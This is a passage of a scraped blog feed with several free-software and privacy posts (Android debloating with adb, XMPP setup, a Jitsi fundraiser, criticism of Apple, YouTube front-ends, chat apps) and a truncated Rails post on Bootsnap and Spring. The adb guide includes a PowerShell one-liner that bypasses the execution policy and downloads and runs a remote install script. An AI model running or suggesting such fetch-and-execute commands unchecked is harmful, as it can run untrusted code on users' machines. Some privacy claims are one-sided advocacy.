He responded, “I work for GNU.” I asked, “What’s that?” He said, “GNU’s not Unix.” I got very confused at this point, as I didn’t know what GNU or Unix were, and we had already pissed him off by associating him with Linux.\nThen, he said, “I work for free software.” This added to my confusion, as I wondered why someone would work for free-of-cost software. Then he explained what free software is: “Free Software is software that gives users four freedoms.\nFreedom 0 is the freedom to run the software as you wish.\nFreedom 1 is the freedom to study and modify the program. You need to have the source code of the program to exercise this freedom.\nFreedom 2 is the freedom to share the program.\nFreedom 3 is the freedom to share your modified versions.\nThe ‘free’ does not mean free of cost. It means freedom. Think of it like free speech and not free beer.”\nAt that point, I only knew that a lot of programs do not have freedom 1. I didn’t know that a lot of software does not give users the freedom to share or run it. So naturally, I didn’t understand why he had to emphasize these freedoms and why they are important. Also, I used to think all software had freedoms 0, 2 and 3. I remember having the (wrong) notion that the freedom to study and modify the source code is for programmers only.\nThen, he said, “Any software which does not give users these four freedoms is called a nonfree\u002Fproprietary software. A proprietary software is under developer’s control, and you are at the mercy of the developer. A free software is controlled by its users. I use only free software and reject all proprietary software and, you should do it too.”\nHis voice was quite passionate when he was telling us those things. Further, he told us that Microsoft Windows is an example of proprietary software and mentioned that a backdoor had been found in Windows in the past. I didn’t know what a backdoor meant, and I don’t remember if he told us.\nHe had hearing problems, so we had to be loud while interacting with him. My friend then asked about Apple’s software, something like “Is Apple’s software secure?” Stallman replied with something about Apple locking in its users and Apple’s software being nonfree. But I forgot a lot of what he said.\nI remember that he also said that Google services are surveillance systems, and he does not use them. He insisted that we should also refuse to use them. I remember him mentioning that the NSA spies on Americans as well as other countries’ citizens using Google services like Gmail and Google Maps. Poor me, I didn’t know what the NSA was.\nHe also mentioned that Google Maps does not load if he disables the Javascript code sent by the site. Earlier, it used to load without Javascript. He kind of implied that sites should load without Javascript, and he probably gave a few more examples where disabling Javascript stops a website from loading. At that time, I didn’t understand why someone would disable Javascript when visiting a website.\nThen, our principal reminded us to take photos with Richard Stallman. Stallman agreed on the condition that we never upload his photo to Facebook, Instagram or WhatsApp, because that company is a surveillance engine, and we should not feed it. We agreed to the condition and clicked photos with him.\nMy photo with RMS\n\nRichard Stallman was then treated to Dal Vada from our college canteen, and he really liked it.\nThis meeting planted a few questions in my mind about the software I was using. At that time, I didn’t have adequate political understanding to get his point. 
I also found it a bit sad that he is known for “Linux” and “Open Source”, even though he despises those labels.",[],{"slug":2025,"title":2026,"link":2027,"pubDate":2028,"contentSnippet":2029,"tags":2030,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-i-removed-gapps","How I deleted Google, Samsung apps from my Android without rooting","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-i-removed-gapps\u002F","Tue, 27 Jul 2021 00:00:00 +0000","In this post, I will describe how I deleted (yes, deleted, uninstalled, gone! not disabled) Google apps, Samsung apps and the Facebook app from my phone. These apps come pre-installed, and the phone only gives an option to “Disable” them, which does not really do anything; it only stops showing them in the app drawer. These apps are dangerous to users’ privacy and record their whole lives through their phones. You do not need to know anything about the command line to follow this guide.\nSahil’s blog post, Mobile Made More Private, was the one which guided me through this process. Be sure to check it out for more details and for the adb commands cheat sheet that Sahil mentions in that post.\nA fair warning and comment from Chris Titus Tech:\nIt is dangerous to remove system apps that you don’t see in the app drawer. It can lead to you doing a full system recovery.\nOn non-rooted phones some applications are installed as root and error with “[DELETE_FAILED_INTERNAL_ERROR]”. Type this to bypass:\nadb shell pm uninstall --user 0 \nSo, it is a “do at your own risk” article.\nHow I did it\nI have a Samsung Galaxy S9+ phone with Google’s and Samsung’s nonfree software installed on it. I had not yet rooted my phone to install a custom ROM. I have a MacBook which would not let me connect my Android phone using a USB cable, a step which is essential for running commands on your Android to uninstall these apps.\nSo, I connected my phone to a laptop with Windows 10 installed. The steps are similar and the commands are the same if you are using GNU\u002FLinux or macOS (except for the grep command, which works in GNU\u002FLinux but not in Windows, as I will mention).\nThese are the steps I followed in Windows 10:\nStep 1 : Install Chocolatey, a freedom-respecting command-line program for downloading software in Windows. The steps to install Chocolatey are here. You don’t need to visit that link; I will write out all the steps for you.\nBelow are the steps for installing Chocolatey on Windows.\nStep 1a : Press the Windows button on your keyboard and search for ‘PowerShell’. Right-click on PowerShell and choose the option to run it in administrator mode.\nStep 1b : In PowerShell, run the command (that is, copy the following command, paste it into PowerShell, and press Enter):\nGet-ExecutionPolicy\nIf it returns Restricted, run the command:\nSet-ExecutionPolicy AllSigned\nStep 1c : Run the following command:\nSet-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https:\u002F\u002Fchocolatey.org\u002Finstall.ps1'))\nIf you do not get any error message, congratulations! Chocolatey is installed on your system. To confirm, type choco -? in the command line and press Enter; if there is no error, Chocolatey has been installed.\nStep 2 : We will install ADB Platform Tools. 
To install, run the command:\nchoco install adb\nStep 3 : Set up your Android phone:\n3a : Open Settings on your phone, and select “About”.\n3b : Tap on “Build number” seven times.\n3c : Go back, and select “Developer options”.\n3d : Scroll down, and check the “Android debugging” or “USB debugging” entry under “Debugging”.\n3e : Plug your device into your computer.\n3f : On the computer, open up a terminal\u002Fcommand prompt and type adb devices.\n3g : A dialog should show on your device, asking you to allow USB debugging. Check “always allow”, and choose “OK”.\nStep 4 : Run the command:\nadb devices\nThis command should list the Android phone you connected to your computer. If it lists your phone, you are ready to proceed. Otherwise, your phone isn’t connected and adb commands won’t work.\nStep 5 : You can list all the Google packages on your phone by using the command:\nIn Windows: adb shell pm list packages | findstr google \nIn GNU\u002FLinux or macOS: adb shell pm list packages | grep google \nThe following image has commands that can be used to uninstall Google apps.\n Uninstall Google apps from Android using adb commands\nUninstalling the apps\nLet’s try and uninstall the YouTube app. Check the image above for the package name. The package name for YouTube is com.google.android.youtube. The following command uninstalls YouTube (the same command works on Windows, macOS and GNU\u002FLinux):\nadb shell pm uninstall -k --user 0 com.google.android.youtube\nIf the command returns the message Success, then you have successfully uninstalled YouTube.\nSimilarly, you can uninstall any other app with this command by replacing com.google.android.youtube with the package name of that app.\nFor removing the Google Play Store, I used the following command:\nadb shell pm uninstall -k --user 0 com.android.vending\nFor me, uninstalling the Google Play Store was no problem, but I have heard it can be risky.\nI have listed all the commands that I tried on my phone in adb-commands-ravi.txt. Feel free to use some or all of these commands.\nA trick for finding the app ID of most apps is to visit their Google Play Store page. For example, visit the Facebook app on Google Play Store and look at the URL. Copy the part after id=, which is com.facebook.katana.\n To retrieve the package name of an app\nTherefore, the command to uninstall Facebook will be:\nadb shell pm uninstall -k --user 0 com.facebook.katana
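A related aside (an assumption on my part, not from Sahil’s cheat sheet: the cmd package subcommand exists on recent Android versions, roughly Android 7 and later, and behaviour varies by device): since pm uninstall -k --user 0 only removes an app for user 0, you can usually restore a mistakenly removed app without a factory reset:\n# reinstall a package that was uninstalled for user 0\nadb shell cmd package install-existing com.google.android.youtube\nReplace com.google.android.youtube with the package you want back.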
That’s it for now.\nHappy hacking with (hopefully) less tracking :)",[],{"slug":2032,"title":2033,"link":2034,"pubDate":2035,"contentSnippet":2036,"tags":2037,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"xmpp-guide","A guide to set up your XMPP account","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fxmpp-guide\u002F","Sat, 24 Jul 2021 00:00:00 +0000","This is a guide to setting up an account on XMPP, which is a federated chatting system.\nYou can watch this video tutorial to create an XMPP account without giving your phone number to the service:\n\nI will use the freedom-respecting Conversations app for demonstration. The Conversations app is available for Android only, and it is a paid app on the Google Play Store. If you would like to support the development of the Conversations app, you can download it from the Google Play Store. Otherwise, you can follow the steps below to download the Conversations app free of cost. If you would like to download a free-of-cost XMPP app from the Play Store, then check out the Blabber app.\nCurrently, the Blabber app is very good for XMPP. It has some functionality beyond the Conversations app, features which users often request in Conversations.\nSome examples of XMPP apps for other platforms are: Dino for GNU\u002FLinux, Gajim for Windows and GNU\u002FLinux, and Monal for macOS and iOS. You can choose any XMPP app, and this guide probably works for all of them. A list of XMPP apps is here, and all of them support OMEMO encryption by default.\nYou don’t need to give any personal details, like a phone number or email, to create an account. If you would like to register an XMPP account using your phone number (similar to how you set up WhatsApp), then you can try the Quicksy app, which still respects your freedom, as you can connect to people using any XMPP app and any XMPP service provider (remember that XMPP is federated!).\nSteps to set up an account in the Conversations app:\nStep 1: Download F-Droid from here.\nF-Droid is a repository of free software apps. It is a privacy-respecting alternative to the Google Play Store. One difference is that F-Droid only contains apps which are freedom-respecting (they respect all four freedoms mentioned here) and which have been checked by the F-Droid community for malicious features.\nF-Droid will also ensure that your app receives all future updates. The F-Droid community also builds apps from the source code, which ensures that the source code indeed matches the app you download to your system.\nStep 2: Search for the “Conversations” app in F-Droid and install it.\nStep 3: Register an XMPP account on any XMPP server. You can choose an XMPP service provider from this URL. It will give you a list of 5 servers you can register on, and 5 different random servers each time you refresh the page.\nStep 4: Open the Conversations app and then click on the ‘I already have an account’ option.\nStep 5: In the XMPP address option, put your XMPP address, which will be of the format username@domain, depending on which site you signed up on. Click ‘Next’.\nStep 6: You can add a profile picture if you wish and then click ‘Publish’. If you do not want to add a profile picture, select ‘Skip’.\nStep 7: The Conversations app will ask for permission to access your contacts. You can click ‘Deny’.\nStep 8: The Conversations app will then ask you to stop battery optimization for the app. I suggest you allow Conversations to run without battery optimization so it can stay connected in the background. The developer of the Conversations app has explained how this permission has virtually zero impact on battery life.\nStep 9: To add a contact, press the ‘+’ button at the bottom of the Conversations app and click on ‘Add Contact’.\nStep 10: Type the XMPP address of the XMPP user you want to contact. In the image, I have entered my own XMPP address - ravi@poddery.com - as an example.\nStep 11: Just send an introduction message to your friend to exchange your OMEMO keys.\nCongratulations on setting up your XMPP account. All messages will be OMEMO encrypted by default, meaning that only you and the person you are exchanging messages with can read them. 
The Conversations app also supports voice and video calls with any XMPP app that supports the same.",[],{"slug":2039,"title":2040,"link":2041,"pubDate":2042,"contentSnippet":2043,"tags":2044,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fsci-jmc","My experience in volunteering for FSCI's Jitsi Meet Crowdfunding campaign","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffsci-jmc\u002F","Wed, 21 Jul 2021 00:00:00 +0000","Free Software Community of India (FSCI) is committed to promoting software freedom and making privacy accessible to common people. Campaigning and raising awareness for privacy and urging people not to use Google\u002FFacebook\u002FZoom and other proprietary services is not enough; users must also have alternatives to these services, which have pretty much turned into a necessity (for privileged people), especially in pandemic times. Jitsi is freedom-respecting video-conferencing software which gives users control over the software. Jitsi allows anyone to run their own server, allowing them to fully control their means of communication. Since it is not feasible for everyone to run their own Jitsi server, FSCI decided to run its own server, which would be open to all, usable by anyone for their meetings, funded by voluntary donations, and respectful of users’ privacy.\nTo run a server funded by donations, we needed volunteers for: running and maintaining a Jitsi server, writing the script for the fundraiser video, asking for donations in the fundraiser video, editing the fundraiser video, maintaining the website, providing a bank account to accept donations, replying to emails regarding queries, and taking the initiative to coordinate all this.\nI think it was around November 2020 when Sahil told me about FSCI’s initiative to run a Jitsi server, and I agreed to volunteer to ask for donations in the fundraiser video. Arun Mathai guided me through the process. We had meetings, rehearsed the script a few times and assigned the lines. I had some problems shooting the video of myself speaking into the camera; talking to a camera alone is not exactly my strong point. After several attempts, I could make a clip which was fine to be included in the fundraiser video (thanks to mom for shooting the clip).\nWe thought it would be good if there was diversity among the people asking for donations in the fundraiser video. So, I asked my friend Ashutosh, who is also inclined towards free software, if he could help. He discussed the fundraiser with his friends, and two of them volunteered to appear in the video to ask for donations. This opportunity raised awareness about free software and the existence of community-powered services among his friends, which furthers our goal. I also asked my friend Sayan to record the Bengali snippet of the video, and he agreed to volunteer for the same.\nIt took some months after that (we did all of the above by the end of December 2020) to finally release the website and get the Jitsi server actually operational. Since the release, we at FSCI use meet.fsci.in for all our meetings. I use this server for all my personal meetings.\nI am glad that the fundraiser is going strong – as of writing, we have raised 57% of the funds needed to run the service for 2 years. 
As of now, I think that drafting the privacy policy is the major pending task, which I will try to do as soon as possible.\nYou are invited to use the Jitsi server at meet.fsci.in for your personal meeting needs without worrying about someone prying on you. You can also host your classes there. The server can handle around 30 participants in a meeting. If you would like to support the service, you can donate by visiting here or volunteer to help us run the service by contacting FSCI. Transparency is ensured by publicly listing all the contributors and their donation amounts (you can be an anonymous contributor).\nPlease send your comments\u002Fsuggestions on the fundraiser\u002Fmeet server to FSCI (the contact option is at the bottom of the linked page).\nThanks to all the volunteers and contributors for making meet.fsci.in possible.",[],{"slug":2046,"title":2047,"link":2048,"pubDate":2049,"contentSnippet":2050,"tags":2051,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"apple-trap","Apple's privacy trap","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fapple-trap\u002F","Tue, 13 Jul 2021 00:00:00 +0000","Apple is a company which claims that protecting users’ privacy is one of its core values. Recently, they announced a new iOS software update under which apps made by independent developers have to request explicit permission from users before tracking them.\nThat means Apple cares about users’ privacy.\nOr do they?\nSure, they are not involved in targeted advertising, and they don’t earn money from your data and therefore do not track you, right?\nAnd they encrypt all the contents of iOS devices, making it impossible for third parties to access your data, right?\nThey are working day and night to make your life better and more convenient and, at the same time, to defend your privacy. What more can we ask for?\nWell… we don’t know if any of these claims are true, because Apple’s iOS is a nonfree\u002Fproprietary program, and therefore these claims cannot be independently verified. Apple does not give its users the freedom to study how iOS works; it does not provide its source code.\nProprietary software controls the user. Source: Richard Stallman's TED talk slides, released under the CC-BY 3.0 license.\n\nEven if Apple’s claims are true, this only means you get privacy from others, not from Apple. They might be encrypting all your contents stored in iOS – we don’t know – but they have also installed backdoors. This means Apple can make changes on your devices remotely without your permission. They can add malicious features to the software at any time without you knowing. Backdoors have been found in macOS as well as in iOS. That means your computer isn’t yours.\nWhile Apple says that it respects its users’ privacy, its track record says exactly the opposite.\nSnowden’s documents show that Apple is a part of the NSA’s global surveillance program.\nIn China, it stores all user data on servers controlled by the Chinese government.\nAll the search queries made in macOS’s Spotlight are sent to Apple.\nApple uploaded private files of its users to iCloud without consent.\nDo you remember Siri? Siri is Apple’s voice assistant. It is Apple’s voice assistant, not your voice assistant. You might think that Siri listens to you only when prompted, but it turns out that it listens and records all the time. 
Apple also hires people specifically to listen to users’ Siri recordings.\nYou can check out more cases of surveillance by Apple by visiting this link.\nCory Doctorow argues that surrendering your autonomy by moving into Apple’s fortress has the same problem as all benevolent dictatorships: it works well, but fails badly. Let me quote Cory Doctorow from this article,\nApple rightly points out that the world is full of bandits who will steal your data and money and ruin your life, and it holds itself out as your protector …. But when Apple sides with the bandits, the walls that once protected you now make you easy prey.\nOverall, Apple claims to be the guardian of its users’ privacy, while its track record is exactly the opposite: it increased surveillance of users with the latest macOS update, and it won’t allow third-party repair shops even though its own “authorized” technicians leak users’ data. Apple’s privacy claims, at their best, only give users privacy from third parties. That is their privacy trap: redefine privacy to mean privacy from others, and earn goodwill by advertising that they care about users’ privacy. Surveillance is just a symptom of proprietary software. The bigger problem is that Apple keeps tight control over iDevices and users don’t control them.\nThe only software we can trust is free software, which respects users’ freedom. Users have control over the software if it is free software. If the software is free, users can check for malicious code and remove malicious functionality.\nFree Software respects your freedom. Source: Richard Stallman's TED talk slides, released under the CC-BY 3.0 license.\n\nNonfree software, on the other hand, is malware. Apple’s iOS is malware because it is nonfree software. It is a black box. We never know what it is up to, so any trust in Apple respecting users’ privacy is blind trust.",[],{"slug":2053,"title":2054,"link":2055,"pubDate":2056,"contentSnippet":2057,"tags":2058,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"accessing-youtube","Accessing YouTube without giving away your privacy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Faccessing-youtube\u002F","Mon, 12 Jul 2021 00:00:00 +0000","YouTube is a platform where people upload and watch videos. I don’t think YouTube needs any introduction among internet users. What is not usually mentioned about YouTube is that it tracks its users. Further, YouTube’s algorithms distort the truth, it censors works that are fair use under copyright law, and it doesn’t let you download videos to your device, even the ones you purchased.\nAn analysis of YouTube’s privacy policy is here.\nIn short, it is not YouTube, it is TheirTube. Knowing someone is always watching you has inhibiting effects. I don’t want to be tracked or manipulated by YouTube’s algorithms. Fortunately, YouTube is accessible using free software in ways which respect your privacy. I will list some workarounds for watching YouTube videos. All the software mentioned here is free software (which means it respects your freedom). Please read this article to understand why we must insist on free software.\nOn the desktop, YouTube videos can be watched using Invidious. You can visit any of the Invidious instances here from any browser and search for the video you would like to watch. Invidious also allows you to visit via Tor, which hides your IP address. 
You can use the Privacy Redirect plugin in Firefox and Tor Browser to automatically redirect YouTube links to Invidious. This plugin also redirects Twitter, Instagram, Reddit, Google Maps and Google Translate links to their privacy-respecting front-ends. You can also check out a bunch of other freedom-respecting software that you can use to watch YouTube videos.\nPiped is a free software frontend to YouTube. You can watch YouTube videos using Piped in your browser by visiting this URL. Piped does not expose your IP address to YouTube.\nThe FreeTube app can also be used to watch YouTube videos. The app is available for all the GNU\u002FLinux distros, macOS and Windows. FreeTube respects your privacy as well. Please read the privacy section of their FAQ for details.\nYoutube-dl is another software you can use on desktop to watch videos. It is a command-line program that downloads videos from YouTube to your system. It is my favorite, and I fell in love with it when I realized how capable it is. It is very powerful, and it supports downloading videos from many other sites as well. You can also download audio files by extracting the audio from YouTube videos using youtube-dl. It supports downloading playlists as well. I plan to write a blog post in the future on using the command line to download with youtube-dl, for beginners.\nFor Android, the NewPipe app can be used to watch YouTube videos. NewPipe shows no ads, does not track you, can run in the background, and can download audio\u002Fvideo files to your phone. NewPipe can also stream videos which are being live-streamed on YouTube. In addition to YouTube, you can access SoundCloud, media.ccc.de, PeerTube instances and Bandcamp using NewPipe.\nFor iOS, I don’t know any workarounds. If you know of any, please let me know. iOS is, in general, very hostile to user freedom, so the only way to freedom is to avoid iOS.\nWhile these workarounds work well, we cannot rely on Google to let them keep working. The workarounds do not really solve the problem. The real solution is for videos to be posted on a platform which respects users’ freedom (which is a more complicated issue than the freedom of the software installed on your system). You can upload videos on PeerTube or your own website to respect users’ freedom and allow them to download the videos as well. I have a channel on PeerTube on the instance set up by FSCI. You can set up a donation-based model to earn money from your videos. Users can send you money directly to your account for your work. You can also earn money by selling merchandise. For this model to be successful, we need more people to join in rejecting YouTube and similar tracking services.",[],{"slug":2060,"title":2061,"link":2062,"pubDate":2056,"contentSnippet":2063,"tags":2064,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"chatting-apps","Choosing a privacy-respecting chatting app","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fchatting-apps\u002F","Which chatting app do you use to contact your loved ones?\nDo you use WhatsApp?\nDo you use Telegram or Signal?\nWhat if you do not agree to the terms and conditions or privacy policy of these apps?\nWell, either you need to accept their terms or switch to some other app and do the hard work of convincing every contact to move to the new chat app whose terms you can agree to. What if you are a student and all the important notifications are sent to the WhatsApp group? Would you convince your school to avoid WhatsApp? What if they don’t care?
Now you are forced to be on WhatsApp to make sure you don’t miss any important updates. So, when you click ‘I Agree’ on the document which says, “We will put you under surveillance. It has a lot of benefits. Your life will be very convenient”, do you really agree, or did you just give in to social pressure? Or did you not care? Do you really have a choice?\n  Why SMS refuses to die. Source: https:\u002F\u002Fxkcd.com\u002F2365\u002F \n\nSo, how do we control our means of communication? What does controlling our communications mean? If we control our means of communication, can we ensure privacy as well? I will go into the details of what I mean when I say that the users control the software. If the users have the freedom to run, copy, distribute, study, change and improve the software, then the users control the software. Such software is called free software, where ‘free’ refers to freedom and not to price. In this article, ‘free’ refers to freedom and never to price. I suggest you read this article to understand why these freedoms are important and how they give users control over the software. Examples of free software (freedom-respecting) chatting apps are Telegram, Signal, Quicksy, Element etc. If users lack any of these freedoms, then the software is called nonfree\u002Fproprietary, and such software cannot be trusted by the user. WhatsApp is an example of nonfree\u002Fproprietary software.\n Image: Free software respects your freedom. Source: Richard Stallman's TED talk slides, released under a CC-BY 3.0 license. \n\n\nChatting apps usually have two components: 1. the app that you install on your device; 2. a server (we will call it a service provider) which transfers the messages from the sender to the recipient. If you control only the software, the service provider still has the power to impose unjust conditions on you. In the above-mentioned example, Signal is free software, which includes the freedom to modify the code, but when a project modified the Signal app code, Signal refused to allow them to connect to their server or federate with any other server. This is not true freedom. So, to control our chatting system, the software must be free, but that is not enough.\nTherefore, for full control, we need federated chat systems – which allow users registered with different service providers to communicate with each other. For instance, a mail server run by Google federates with a mail server run by Microsoft when you send email from @gmail.com to @hotmail.com. So you can choose free software and a trusted, community-run service provider, and this is what I mean by having control over our communications. This control is collective control by the community. Examples of such systems are Matrix and XMPP. Federation answers the question raised earlier: what to do if the service provider imposes terms and conditions you do not agree with? You can switch to another service provider, or you can be a service provider yourself and still communicate with your contacts. You don’t need to convince them to switch to a new provider. Examples of Matrix apps are Element, Nheko, FluffyChat etc. Examples of XMPP apps are Conversations, Dino, Gajim, Siskin IM etc. Make sure that the app supports end-to-end encryption, which means only the sender and recipient can read the messages.\n A graphical demonstration of how end-to-end encryption works. Credits: Cryptpad \n\n\nThe Quicksy app is at the intersection of freedom and convenience.
It registers the account with a phone number, which makes the app convenient and easy to use. It federates with XMPP, so no one is forced to use Quicksy, and other people can use some other XMPP app (like Conversations) which does not require any personal details to create an account.\nTo get started with XMPP, you can use this guide, or use the Quicksy app if you don’t mind registering with your phone number.\nThe Telegram and Signal apps are freedom-respecting, but since they are not federated, the overall chatting system is not freedom-respecting.\nAnother way to freedom is to use freedom-respecting encrypted messaging apps which do not involve any servers. These are called peer-to-peer apps. The downside here is that both users need to be online at the same time to exchange messages. You can choose to run the app in the background to receive messages. Examples: Briar, GNU Jami, Tox.\nTL;DR: A free software app + federated chat systems like Matrix or XMPP, or free software peer-to-peer apps like Briar, give users full control over their communications, and therefore you can ensure privacy. Nonfree\u002Fproprietary software controls the users and therefore cannot be trusted for privacy.\nFurther Reading:\nFSF India’s article on the same.\nIt’s all about choices and control.\nInstant Messaging: It’s not about the app - XMPP provides sovereignty of your communication.\nHow to ensure your Instant Messaging solution offers users privacy and security.",[],{"slug":2066,"title":2067,"link":2068,"pubDate":2069,"contentSnippet":2070,"tags":2071,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"bootsnap-and-spring-understanding-rails-boottime-optimisations-html","Bootsnap and Spring, Understanding rails boottime optimisations","https:\u002F\u002Faboobacker.in\u002F2021\u002F06\u002F28\u002Fbootsnap-and-spring-understanding-rails-boottime-optimisations.html","2021-06-28T08:33:00.000Z","Being default Gemfile entries in a Rails project, you may have encountered spring and bootsnap. Here we are going to go through how they work, how they can improve the boot time of your applications, and why you get some weird errors in the app (looking at you, Spring).\nBefore diving into the details, let’s go through some fundamentals to understand things better. Traditionally there were two kinds of languages: compiled languages and interpreted languages. Compiled languages convert the code into a binary format, and that binary gets executed as the program. C, C++, Java etc. are examples of this pattern. Another set of languages, primarily designed for scripting, read individual lines in the code and convert them to machine instructions at runtime.\nRuby’s original implementation, Matz’s Ruby Interpreter (MRI), was an interpreter of this kind. With Ruby 1.9, a new virtual machine called YARV replaced the interpreter.
Here, instead of directly executing the code, Ruby code is converted to an intermediate representation called instruction sequences, and the YARV virtual machine executes them.\nYou can refer to the following diagram for reference.\n\nCredit: Ruby Under a Microscope\nThere are also built-in tools to inspect what is happening in the process; let’s check what happens for a three-line piece of code.\n\nrequire 'ripper'\nrequire 'pp'\ncode = \u003C\u003CCODE\ndef add(x, y)\n  x + y\nend\nCODE\n\n\nLet’s split the code into tokens using the ripper utility:\n\nirb(main):043:0> Ripper.tokenize code\n=> [\"def\", \" \", \"add\", \"(\", \"x\", \",\", \" \", \"y\", \")\", \"\\n\", \"x\", \" \", \"+\", \" \", \"y\", \"\\n\", \"end\", \"\\n\"]\n\n\nAnd see the parsed form using Ripper.sexp:\n\nirb(main):042:0> pp Ripper.sexp(code)\n[:program,\n [[:def,\n   [:@ident, \"add\", [1, 4]],\n   [:paren,\n    [:params,\n     [[:@ident, \"x\", [1, 8]], [:@ident, \"y\", [1, 11]]],\n     nil,\n     nil,\n     nil,\n     nil,\n     nil,\n     nil]],\n   [:bodystmt,\n    [[:binary,\n      [:var_ref, [:@ident, \"x\", [2, 0]]],\n      :+,\n      [:var_ref, [:@ident, \"y\", [2, 4]]]]],\n    nil,\n    nil,\n\n\nWe can also take a look at how the instruction sequence (YARV code) looks:\n\nirb(main):052:0> puts RubyVM::InstructionSequence.compile(code).disasm\n== disasm: #\u003CISeq:\u003Ccompiled>@\u003Ccompiled>:1 (1,0)-(3,3)> (catch: FALSE)\n0000 definemethod                           :add, add                 (   1)[Li]\n0003 putobject                              :add\n0005 leave\n\n== disasm: #\u003CISeq:add@\u003Ccompiled>:1 (1,0)-(3,3)> (catch: FALSE)\nlocal table (size: 2, argc: 2 [opts: 0, rest: -1, post: 0, block: -1, kw: -1@-1, kwrest: -1])\n[ 2] x@0\u003CArg>   [ 1] y@1\u003CArg>\n0000 getlocal_WC_0                          x@0                       (   2)[LiCa]\n0002 getlocal_WC_0                          y@1\n0004 opt_plus                               \u003Ccalldata!mid:+, argc:1, ARGS_SIMPLE>\n0006 leave                                                            (   3)[Re]\n=> nil\n\n\nExplaining the terms in the parsed and compiled code is beyond the scope of this blog post; I recommend reading Ruby Under a Microscope.\nNewer versions of Ruby also allow us to compile the code to binary and execute it later. It is experimental and platform dependent.\n\n? cat example.rb\nnumber = 23\nputs number + 23\n? ruby -e \"File.write('example.bin',RubyVM::InstructionSequence.compile_file('example.rb')\n.to_binary)\"\n? cat example.bin\nYARB@\n     ?x86_64-darwin18%?#?%?gw\nnumberE+Eexampleputs?????????%\n\n\n\nirb(main):018:0>  RubyVM::InstructionSequence.load_from_binary(File.read('example.bin')).eval\n46\n\n\nThat is it for the ruby compilation process for now.
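Before moving on, it is worth seeing why cached bytecode matters. Here is a rough, illustrative benchmark (a sketch; the exact numbers will vary by machine) comparing compiling from source against loading a pre-compiled binary, reusing the example.rb file from above:\n\nrequire 'benchmark'\n\nsrc = File.read('example.rb')\nbin = RubyVM::InstructionSequence.compile_file('example.rb').to_binary\n\nBenchmark.bm(12) do |x|\n  # tokenize + parse + compile the source on every iteration\n  x.report('compile:') { 1000.times { RubyVM::InstructionSequence.compile(src) } }\n  # skip parsing and compilation entirely\n  x.report('from binary:') { 1000.times { RubyVM::InstructionSequence.load_from_binary(bin) } }\nend\n\nLoading from binary skips the tokenize\u002Fparse\u002Fcompile pipeline described above, which is exactly the saving Bootsnap (covered later) exploits.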
Now let’s see how Ruby’s require method works.\nContrary to what I thought initially, require is not a keyword in ruby; it is a method from Ruby’s Kernel module.\nLet’s look at an overly simplified version of the require method for our context.\n\ndef require(filename)\n  eval File.read(filename)\nend\n\n\nTwo main issues with this implementation are:\nRequiring the same file again will load the file again\nOnly absolute paths are supported\nWe can fix these issues in the following ways:\n\n  $LOADED_FEATURES = []\n  def require(filename)\n    return false if $LOADED_FEATURES.include?(filename)\n    eval File.read(filename)\n    $LOADED_FEATURES \u003C\u003C filename\n  end\n\n\n\n  $LOAD_PATH = []\n  # $LOAD_PATH += gem paths + stdlib paths + application code paths\n\n  def require(filename)\n    full_path = $LOAD_PATH.find do |path|\n      File.exist?(File.join(path, filename))\n    end\n\n    eval File.read(full_path)\n  end\n\n\nWhile the above code snippets are dummy implementations, Ruby actually uses the globals $LOADED_FEATURES and $LOAD_PATH for the same purpose. Here are stats from one of our apps for reference:\n\nirb(main):054:0>  $LOADED_FEATURES.count\n=> 6552\n\n\n\nirb(main):058:0> $LOAD_PATH.count\n=> 779\n\n\nAnother important concept we need to recall is the fork system call in POSIX systems. fork allows the OS to create a new child process with the same memory space. Modern hardware architectures like x86 allow the OS to optimise fork with a mechanism called copy-on-write. In short, it is much cheaper to fork a running app than to load that app from scratch.\nNow let’s look at the gems from the title.\nSpring is a Rails-only tool to speed up development and test environments. It keeps your app process running in the background for the development and test environments and acts as a server. When you run a process like bundle exec rails server or bundle exec rspec, it sends data like the command, ENV values, arguments etc. to the Spring server, and the Spring server will fork the app process and run the task.\nSince the server process has already loaded the app, the loading time of the app will be negligible and your task will run faster.\nBut when the code changes, the server process needs to update, and it may fail for various reasons, like newly added directories. That is why you end up having to run spring stop manually or restart the system to make the application behave as expected.\nThe serve method in Spring is provided below as a reference. You can see it zipping IO values, fetching arguments, env etc. from the client, and forking the new process in the snippet.\n\n def serve(client)\n      log \"got client\"\n      manager.puts\n\n      _stdout, stderr, _stdin = streams = 3.times.map { client.recv_io }\n      [STDOUT, STDERR, STDIN].zip(streams).each { |a, b| a.reopen(b) }\n\n      preload unless preloaded?\n\n      args, env = JSON.load(client.read(client.gets.to_i)).values_at(\"args\", \"env\")\n      command   = Spring.command(args.shift)\n\n      connect_database\n      setup command\n\n      if Rails.application.reloaders.any?(&:updated?)\n        Rails.application.reloader.reload!\n      end\n\n      pid = fork {\n        Process.setsid\n        IGNORE_SIGNALS.each { |sig| trap(sig, \"DEFAULT\") }\n        trap(\"TERM\", \"DEFAULT\")\n\n        unless Spring.quiet\n          STDERR.puts \"Running via Spring preloader in process #{Process.pid}\"\n\n          if Rails.env.production?\n            STDERR.puts \"WARNING: Spring is running in production. 
